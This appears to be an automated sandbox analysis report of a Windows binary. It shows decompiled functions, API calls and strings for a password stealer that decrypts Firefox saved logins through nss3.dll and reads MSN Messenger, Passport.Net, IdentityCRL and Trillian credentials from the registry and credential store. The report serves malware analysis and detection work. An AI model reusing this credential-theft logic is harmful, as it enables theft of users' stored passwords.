SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
memset.MSVCRT ref: 00410CB4
strlen.MSVCRT ref: 00410CBE
strlen.MSVCRT ref: 00410CCC
LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

PK11SDR_Decrypt, xrefs: 00410D55
PK11_Authenticate, xrefs: 00410D49
nss3.dll, xrefs: 00410CB9, 00410CE2
PK11_FreeSlot, xrefs: 00410D3D
NSS_Init, xrefs: 00410D1D
PK11_GetInternalKeySlot, xrefs: 00410D31
NSS_Shutdown, xrefs: 00410D25

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
API String ID: 2719586705-3659000792
Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54

Uniqueness

Uniqueness Score: -1.00%

Function 004110AF, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(psapi.dll,?,00411155,00404495,00000000,00000000,00000000), ref: 004110C2
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 004110DB
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004110EC
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 004110FD
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041110E
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0041111F
FreeLibrary.KERNEL32(00000000), ref: 0041113F

Strings

GetModuleFileNameExA, xrefs: 004110F7
EnumProcessModules, xrefs: 004110E6
GetModuleInformation, xrefs: 00411119
psapi.dll, xrefs: 004110BD
GetModuleBaseNameA, xrefs: 004110D5
EnumProcesses, xrefs: 00411108

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
API String ID: 2449869053-232097475
Opcode ID: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
Instruction ID: 150d9d7abe9eb73bde655d9ea944b9d4c8ac0ad9fe74c99b0592c1ab8213f4a8
Opcode Fuzzy Hash: ee84c210bc0f50ddd9e1354071252ba1724dd235f625d6dd127ec76221b6c85c
Instruction Fuzzy Hash: CA01B138941212FAC7209F26AD04BE77EE4578CB94F14803BEA04D1669EB7884828A6C

Uniqueness

Uniqueness Score: -1.00%

Function 004103F1, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 99registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,7614F420,00000000,?,0040DCC1,?), ref: 0041041E
RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,7614F420,00000000,?,0040DCC1,?), ref: 00410436
RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,7614F420,00000000,?,0040DCC1), ref: 0041045F
RegCloseKey.ADVAPI32(?,?,7614F420,00000000,?,0040DCC1), ref: 00410509

Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC

memcpy.MSVCRT ref: 004104C8
memcpy.MSVCRT ref: 004104DD

Part of subcall function 004100A4: RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,?,?,004104FD,?,?,?,?), ref: 004100C8
Part of subcall function 004100A4: memset.MSVCRT ref: 004100EA
Part of subcall function 004100A4: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
Part of subcall function 004100A4: RegCloseKey.ADVAPI32(?), ref: 004101F8

LocalFree.KERNEL32(0040DCC1,7614F420,?,?,?,7614F420,00000000), ref: 00410500
RegCloseKey.KERNELBASE(?,?,7614F420,00000000,?,0040DCC1,?), ref: 00410512

Strings

Software\Microsoft\IdentityCRL, xrefs: 00410414
%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd, xrefs: 004104A0, 004104C6
Dynamic Salt, xrefs: 0041042E
Value, xrefs: 00410450

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
API String ID: 2768085393-1693574875
Opcode ID: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
Instruction ID: a3322e4f6880ec2e25c1dd16e8e651f617ea5ab7975a499ff40f994b3e8bdadf
Opcode Fuzzy Hash: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
Instruction Fuzzy Hash: B631E7B690011DABDB119B95EC45EEFBBBDEF48348F004066FA05F2111E7749A848BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004064FB, Relevance: 19.7, APIs: 10, Strings: 3, Instructions: 158
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004064FB(void* __eax, intOrPtr _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				void _v275;
				char _v276;
				void _v539;
				char _v540;
				void _v803;
				char _v804;
				void _v1067;
				char _v1068;
				void* __ebx;
				void* __edi;
				signed int _t53;
				signed int _t54;
				int _t61;
				int _t64;
				int _t67;
				void* _t71;
				void* _t73;
				void* _t75;
				intOrPtr* _t76;
				intOrPtr _t115;

				_v8 = _v8 & 0x00000000;
				_t115 = _a4 + 4;
				_v12 = _t115;
				0x410c4c(); // executed
				if(__eax != 0) {
					_v1068 = 0;
					memset( &_v1067, 0, 0x104);
					E00406958(0x104,  &_v1068, _a8);
					_t53 =  *(_t115 + 4);
					if(_t53 == 0) {
						_t54 = _t53 | 0xffffffff;
						__eflags = _t54;
					} else {
						_t54 =  *_t53( &_v1068);
					}
					if(_t54 == 0) {
						_v276 = 0;
						memset( &_v275, 0, 0x104);
						_v804 = 0;
						memset( &_v803, 0, 0x104);
						_v540 = 0;
						memset( &_v539, 0, 0x104);
						_t61 = strlen(_a8);
						_t19 = strlen(0x4181fc) + 1; // 0x1
						if(_t61 + _t19 >= 0x104) {
							_v276 = 0;
						} else {
							E00406B4B( &_v276, _a8, 0x4181fc);
						}
						_t64 = strlen(_a8);
						_t25 = strlen(0x418208) + 1; // 0x1
						if(_t64 + _t25 >= 0x104) {
							_v804 = 0;
						} else {
							E00406B4B( &_v804, _a8, 0x418208);
						}
						_t67 = strlen(_a8);
						_t31 = strlen(0x418218) + 1; // 0x1
						if(_t67 + _t31 >= 0x104) {
							_v540 = 0;
						} else {
							E00406B4B( &_v540, _a8, 0x418218);
						}
						_t71 = E004069D3( &_v276);
						_t131 = _t71;
						if(_t71 != 0) {
							E004062DB(_t131, _a4,  &_v276);
						}
						_t73 = E004069D3( &_v804);
						_t132 = _t73;
						if(_t73 != 0) {
							E004062DB(_t132, _a4,  &_v804);
						}
						_t75 = E004069D3( &_v540);
						_t133 = _t75;
						if(_t75 != 0) {
							E004062DB(_t133, _a4,  &_v540);
						}
						_t76 =  *((intOrPtr*)(_v12 + 8));
						_v8 = 1;
						if(_t76 != 0) {
							 *_t76();
						}
					}
					0x410d6f();
				}
				return _v8;
			}

0x00406504
0x0040650d
0x00406511
0x00406514
0x0040651b
0x00406530
0x00406537
0x00406548
0x0040654d
0x00406555
0x00406563
0x00406563
0x00406557
0x0040655e
0x00406560
0x00406568
0x00406577
0x0040657e
0x0040658f
0x00406596
0x004065a7
0x004065ae
0x004065b9
0x004065cc
0x004065d3
0x004065e8
0x004065d5
0x004065df
0x004065e5
0x004065f2
0x00406605
0x0040660c
0x00406621
0x0040660e
0x00406618
0x0040661e
0x0040662b
0x0040663e
0x00406645
0x0040665a
0x00406647
0x00406651
0x00406657
0x00406668
0x0040666d
0x00406670
0x0040667c
0x0040667c
0x00406688
0x0040668d
0x00406690
0x0040669c
0x0040669c
0x004066a8
0x004066ad
0x004066b0
0x004066bc
0x004066bc
0x004066c4
0x004066c9
0x004066d0
0x004066d2
0x004066d2
0x004066d0
0x004066d4
0x004066d4
0x004066e0

APIs

Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
Part of subcall function 00410C4C: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
Part of subcall function 00410C4C: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F

memset.MSVCRT ref: 00406537

Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972

memset.MSVCRT ref: 0040657E
memset.MSVCRT ref: 00406596
memset.MSVCRT ref: 004065AE
strlen.MSVCRT ref: 004065B9
strlen.MSVCRT ref: 004065C7
strlen.MSVCRT ref: 004065F2
strlen.MSVCRT ref: 00406600
strlen.MSVCRT ref: 0040662B
strlen.MSVCRT ref: 00406639

Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7

Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT ref: 004064E5
Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE

Strings

signons2.txt, xrefs: 004065F8, 004065FD, 0040660E
signons.txt, xrefs: 004065BF, 004065C4, 004065D5
signons3.txt, xrefs: 00406631, 00406636, 00406647

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memsetstrlen$AddressProc$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
String ID: signons.txt$signons2.txt$signons3.txt
API String ID: 4081699353-561706229
Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3A0, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 109
stringCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040D3A0(char* _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t20;
				int _t24;
				char _t28;
				void* _t39;
				char* _t56;
				char* _t60;
				char* _t62;
				char* _t63;
				void* _t64;

				_t56 = _a4;
				 *_t56 = 0;
				_v268 = 0;
				_t20 = memset( &_v267, 0, 0x104);
				_t60 =  &_v268;
				0x411dae(0x80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian", "UninstallString", 0x104); // executed
				if(_t20 != 0) {
					_t39 = E00407139(0, "trillian.exe");
					if(_t39 > 0) {
						 *((char*)(_t64 + _t39 - 0x109)) = 0;
						if(E004069D3(_t60) != 0) {
							0x413d0c(_t56, _t60);
						}
					}
				}
				if( *_t56 == 0) {
					_v268 = 0;
					0x41212c(); // executed
					_t63 =  &_v268;
					E0040680E(_t63);
					E00406958(0x104, _t63, "trillian");
					if(E004069D3(_t63) != 0) {
						0x413d0c(_a4, _t63);
					}
				}
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				0x41223f(0x1a); // executed
				_t62 = _a4 + 0x105;
				_t24 = strlen("Trillian\users\global");
				_t17 = strlen( &_v532) + 1; // 0x1
				if(_t24 + _t17 >= 0x104) {
					 *_t62 = 0;
				} else {
					E00406B4B(_t62,  &_v532, "Trillian\users\global");
				}
				_t28 = E004069D3(_t62);
				if(_t28 == 0) {
					 *_t62 = _t28;
					return _t28;
				}
				return _t28;
			}

0x0040d3ac
0x0040d3be
0x0040d3c1
0x0040d3c8
0x0040d3dd
0x0040d3e3
0x0040d3ed
0x0040d3f8
0x0040d400
0x0040d402
0x0040d415
0x0040d41b
0x0040d421
0x0040d415
0x0040d400
0x0040d425
0x0040d42d
0x0040d434
0x0040d439
0x0040d43f
0x0040d44b
0x0040d45c
0x0040d464
0x0040d46a
0x0040d45c
0x0040d475
0x0040d47c
0x0040d48a
0x0040d497
0x0040d49d
0x0040d4b0
0x0040d4b9
0x0040d4d2
0x0040d4bb
0x0040d4c9
0x0040d4cf
0x0040d4d6
0x0040d4de
0x0040d4e0
0x00000000
0x0040d4e0
0x0040d4e6

APIs

memset.MSVCRT ref: 0040D3C8

Part of subcall function 00411DAE: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000), ref: 00411DE3

_mbscpy.MSVCRT ref: 0040D41B
_mbscpy.MSVCRT ref: 0040D464
memset.MSVCRT ref: 0040D47C
strlen.MSVCRT ref: 0040D49D
strlen.MSVCRT ref: 0040D4AB

Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171

Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7

Strings

Trillian\users\global, xrefs: 0040D492, 0040D4C1
trillian.exe, xrefs: 0040D3EF
UninstallString, xrefs: 0040D3CE
trillian, xrefs: 0040D444
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian, xrefs: 0040D3D3

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$_mbscpymemset$AttributesCloseFile_memicmp
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian$Trillian\users\global$UninstallString$trillian$trillian.exe
API String ID: 2174551368-3003071570
Opcode ID: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
Instruction ID: 7bc3b858bee9d9e9ac8f81dd2a2494a9b2267e2ac629f59b21fbbbeb3bb54d2f
Opcode Fuzzy Hash: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
Instruction Fuzzy Hash: 72312B7290421469E720AA659C46BDF3B988F11715F20007FF548F71C2DEBCAAC487AD

Uniqueness

Uniqueness Score: -1.00%

Function 00413E10, Relevance: 18.1, APIs: 12, Instructions: 128COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,004153E0,00000070), ref: 00413E25
__set_app_type.MSVCRT ref: 00413E7E
__p__fmode.MSVCRT ref: 00413E93
__p__commode.MSVCRT ref: 00413EA1
__setusermatherr.MSVCRT ref: 00413ECD
_initterm.MSVCRT ref: 00413EE3
__getmainargs.MSVCRT ref: 00413F06
_initterm.MSVCRT ref: 00413F19
GetStartupInfoA.KERNEL32(?), ref: 00413F58
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00413F7C
exit.KERNELBASE ref: 00413F8F
_cexit.MSVCRT ref: 00413F95

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
String ID:
API String ID: 3662548030-0
Opcode ID: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
Instruction ID: 1a0d48d648a4d99901fb7feaec5c467672ee51f091280c2f058e756afb183587
Opcode Fuzzy Hash: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
Instruction Fuzzy Hash: 9841A071D00309DFDB209FA4D884AEE7BB4FB08715F20416BE46197291D7784AC2CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA79, Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 198
registryCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0040DA79(intOrPtr* _a4) {
				void* _v12;
				int _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				int _v40;
				intOrPtr _v48;
				char _v52;
				int _v56;
				int _v60;
				char _v64;
				intOrPtr _v76;
				int _v84;
				int _v88;
				int _v344;
				int _v600;
				char _v856;
				char _v1112;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t73;
				long _t75;
				void** _t76;
				long _t78;
				long _t80;
				char* _t81;
				long _t83;
				char* _t84;
				int _t96;
				int _t115;
				int* _t132;
				int* _t134;
				int* _t136;

				_t115 = 0;
				_v20 = 1;
				_v76 = 0x418ad8;
				_v64 = 0;
				_v56 = 0;
				_v60 = 0;
				0x40fd01();
				_v16 = 0;
				do {
					if(_v16 != _t115) {
						if(_v16 != 1) {
							_t73 =  &_v1112;
							0x40ff88(_t73); // executed
						} else {
							_t75 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
							if(_t75 != 0) {
								goto L5;
							} else {
								_t76 =  &_v12;
								goto L4;
							}
						}
					} else {
						_t78 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MSNMessenger", _t115, 0x20019,  &_v24); // executed
						if(_t78 != 0) {
							L5:
							_t73 = 0;
						} else {
							_t76 =  &_v24;
							L4:
							_t73 =  &_v1112;
							0x40fe5d(_t73, _t76);
						}
					}
					if(_t73 != _t115) {
						_v600 = _t115;
						_v344 = _t115;
						_v88 = _t115;
						_v84 = _t115;
						E00406958(0xff,  &_v344,  &_v856);
						_t132 =  &_v600;
						E00406958(0xff, _t132,  &_v1112);
						_v84 = 1;
						_v88 = 1;
						 *((intOrPtr*)( *_a4))(_t132);
						_t115 = 0;
					}
					_v16 = _v16 + 1;
				} while (_v16 < 3);
				_t80 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
				if(_t80 != 0) {
					_t81 = 0;
				} else {
					_t81 =  &_v1112;
					0x40fd2e("UserMicrosoft RTC Instant Messaging", "PasswordMicrosoft RTC Instant Messaging", _t81,  &_v12);
				}
				if(_t81 != _t115) {
					_v600 = _t115;
					_v344 = _t115;
					_v88 = _t115;
					_v84 = _t115;
					E00406958(0xff,  &_v344,  &_v856);
					_t136 =  &_v600;
					E00406958(0xff, _t136,  &_v1112);
					_v84 = 9;
					_v88 = 0xa;
					_v20 =  *((intOrPtr*)( *_a4))(_t136);
					_t115 = 0;
				}
				_t83 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
				if(_t83 != 0) {
					_t84 = 0;
				} else {
					_t84 =  &_v1112;
					0x40fd2e("UserMicrosoft Exchange Instant Messaging", "PasswordMicrosoft Exchange Instant Messaging", _t84,  &_v12);
				}
				if(_t84 != _t115) {
					_v600 = _t115;
					_v344 = _t115;
					_v88 = _t115;
					_v84 = _t115;
					E00406958(0xff,  &_v344,  &_v856);
					_t134 =  &_v600;
					E00406958(0xff, _t134,  &_v1112);
					_t96 = 0xa;
					_v84 = _t96;
					_v88 = _t96;
					_v20 =  *((intOrPtr*)( *_a4))(_t134);
					_t115 = 0;
				}
				_v28 = _a4;
				_v40 = _t115;
				_v32 = _t115;
				_v36 = _t115;
				_v52 = 0x418ae0;
				0x4103f1( &_v52); // executed
				0x410205( &_v52);
				if(_v48 == _t115) {
					0x410383( &_v52); // executed
				}
				E00404CE0( &_v40);
				E00404CE0( &_v64);
				return _v20;
			}

0x0040da84
0x0040da8d
0x0040da94
0x0040da9b
0x0040da9e
0x0040daa1
0x0040daa4
0x0040daaf
0x0040dab2
0x0040dab5
0x0040daeb
0x0040db0c
0x0040db13
0x0040daed
0x0040db01
0x0040db05
0x00000000
0x0040db07
0x0040db07
0x00000000
0x0040db07
0x0040db05
0x0040dab7
0x0040dacb
0x0040dacf
0x0040dae3
0x0040dae3
0x0040dad1
0x0040dad1
0x0040dad4
0x0040dad5
0x0040dadc
0x0040dadc
0x0040dacf
0x0040db1a
0x0040db22
0x0040db28
0x0040db2e
0x0040db31
0x0040db40
0x0040db4d
0x0040db53
0x0040db61
0x0040db64
0x0040db6a
0x0040db6c
0x0040db6c
0x0040db6e
0x0040db71
0x0040db8f
0x0040db93
0x0040dbb1
0x0040db95
0x0040db99
0x0040dbaa
0x0040dbaa
0x0040dbb5
0x0040dbbd
0x0040dbc3
0x0040dbc9
0x0040dbcc
0x0040dbdb
0x0040dbe8
0x0040dbee
0x0040dbfc
0x0040dc03
0x0040dc0c
0x0040dc0f
0x0040dc0f
0x0040dc25
0x0040dc29
0x0040dc47
0x0040dc2b
0x0040dc2f
0x0040dc40
0x0040dc40
0x0040dc4b
0x0040dc53
0x0040dc59
0x0040dc5f
0x0040dc62
0x0040dc71
0x0040dc7e
0x0040dc84
0x0040dc8f
0x0040dc92
0x0040dc95
0x0040dc9d
0x0040dca0
0x0040dca0
0x0040dca5
0x0040dcac
0x0040dcaf
0x0040dcb2
0x0040dcb5
0x0040dcbc
0x0040dcc5
0x0040dccd
0x0040dcd3
0x0040dcd3
0x0040dcdb
0x0040dce3
0x0040dcef

APIs

Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040DACB

Part of subcall function 0040FF88: CredReadW.ADVAPI32(Passport.Net\*,00000004,00000000,?,7614F420), ref: 0040FFCF
Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
Part of subcall function 0040FF88: LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DB01
RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?,?), ref: 0040DB8F
RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DC25

Strings

Software\Microsoft\MSNMessenger, xrefs: 0040DAC1
PasswordMicrosoft Exchange Instant Messaging, xrefs: 0040DC36
UserMicrosoft Exchange Instant Messaging, xrefs: 0040DC3B
Software\Microsoft\MessengerService, xrefs: 0040DAF7, 0040DB85, 0040DC1B
UserMicrosoft RTC Instant Messaging, xrefs: 0040DBA5
PasswordMicrosoft RTC Instant Messaging, xrefs: 0040DBA0

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Open$ByteCharMultiWidememset$CredFreeLocalRead
String ID: PasswordMicrosoft Exchange Instant Messaging$PasswordMicrosoft RTC Instant Messaging$Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService$UserMicrosoft Exchange Instant Messaging$UserMicrosoft RTC Instant Messaging
API String ID: 2264331338-3472580514
Opcode ID: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
Instruction ID: 22d36e33a130c3ca974138f2eaaf9dbe6720f3348f6af52b077c8fd119907347
Opcode Fuzzy Hash: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
Instruction Fuzzy Hash: CD711BB1D0025DAFDB10DFD5CD84AEEBBB8AB48309F5000BBE505B6241D7786A898B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBF0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040BBF0(void* __eax, intOrPtr _a4) {
				void _v267;
				char _v268;
				char _v531;
				char _v792;
				intOrPtr _v796;
				char _v800;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t31;
				WINDOWPLACEMENT* _t43;
				void* _t45;
				char* _t49;
				struct HWND__* _t50;
				intOrPtr _t52;
				int _t56;

				_t45 = __eax;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				GetModuleFileNameA(0,  &_v268, 0x104);
				_t31 = strrchr( &_v268, 0x2e);
				if(_t31 != 0) {
					 *_t31 = 0;
				}
				0x413cf4( &_v268, ".cfg");
				_v796 = _a4;
				_v800 = 0x419084;
				_v792 = 0;
				_v531 = 0;
				0x413d0c( &_v792,  &_v268);
				0x413d0c( &_v531, "General");
				E004039A8( *((intOrPtr*)(_t45 + 0x38c)),  &_v800); // executed
				_t52 = _v796;
				_t56 = 0x2c;
				if(_t52 != 0) {
					_t50 =  *(_t45 + 0x108);
					if(_t50 != 0) {
						_t43 = _t45 + 0x144;
						_t43->length = _t56;
						GetWindowPlacement(_t50, _t43);
					}
				}
				_t49 =  &_v800;
				 *((intOrPtr*)(_v800 + 0xc))("WinPos", _t45 + 0x144, _t56);
				if(_t52 == 0) {
					E00402D81(_t45);
				}
				return E0040946F( *((intOrPtr*)(_t45 + 0x390)), _t49,  &_v800);
			}

0x0040bc02
0x0040bc0d
0x0040bc14
0x0040bc26
0x0040bc35
0x0040bc3e
0x0040bc40
0x0040bc40
0x0040bc4f
0x0040bc57
0x0040bc6b
0x0040bc75
0x0040bc7c
0x0040bc83
0x0040bc94
0x0040bca8
0x0040bcad
0x0040bcb7
0x0040bcb8
0x0040bcba
0x0040bcc2
0x0040bcc4
0x0040bccc
0x0040bcce
0x0040bcce
0x0040bcc2
0x0040bce7
0x0040bced
0x0040bcf2
0x0040bcf4
0x0040bcf4
0x0040bd0e

APIs

memset.MSVCRT ref: 0040BC14
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0040BC26
strrchr.MSVCRT ref: 0040BC35
_mbscat.MSVCRT ref: 0040BC4F
_mbscpy.MSVCRT ref: 0040BC83
_mbscpy.MSVCRT ref: 0040BC94
GetWindowPlacement.USER32(00000000,?), ref: 0040BCCE

Strings

WinPos, xrefs: 0040BCE2
.cfg, xrefs: 0040BC49
General, xrefs: 0040BC8E

Memory Dump Source

